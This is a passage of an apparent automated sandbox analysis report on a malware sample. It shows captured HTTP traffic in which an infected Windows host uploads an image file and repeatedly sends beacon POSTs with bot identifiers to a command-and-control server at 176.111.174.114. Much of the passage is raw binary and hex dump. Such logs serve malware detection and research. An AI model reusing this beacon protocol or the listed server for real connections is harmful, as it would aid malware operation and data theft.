                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:19.769095898 CEST11648OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:19.769485950 CEST11650OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:19.769598007 CEST11653OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:19.770025969 CEST11656OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:19.770463943 CEST11658OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:19.770665884 CEST11661OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:19.770800114 CEST11664OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:19.771401882 CEST11667OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:19.771588087 CEST11669OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:19.771730900 CEST11672OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          435192.168.2.450010176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.796681881 CEST11672OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          436176.111.174.11480192.168.2.450010C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:19.905201912 CEST11726INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          437192.168.2.450011176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.119419098 CEST11860OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          438176.111.174.11480192.168.2.450009C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.164510965 CEST11861INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          439176.111.174.11480192.168.2.450011C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.225033045 CEST11862INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          44192.168.2.449770176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.598478079 CEST4543OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          440192.168.2.450012176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.430602074 CEST11862OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          441176.111.174.11480192.168.2.450012C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.532105923 CEST11863INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          442192.168.2.450014176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.736064911 CEST11863OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          443176.111.174.11480192.168.2.450014C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:20.836692095 CEST11864INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          444192.168.2.450015176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.052602053 CEST11865OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          445176.111.174.11480192.168.2.450015C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.149344921 CEST11870INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          446192.168.2.450017176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.367979050 CEST11874OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          447176.111.174.11480192.168.2.450017C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.468781948 CEST11875INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          448192.168.2.450019176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.674333096 CEST11875OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          449176.111.174.11480192.168.2.450019C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:21.773132086 CEST11876INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          45176.111.174.11480192.168.2.449770C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
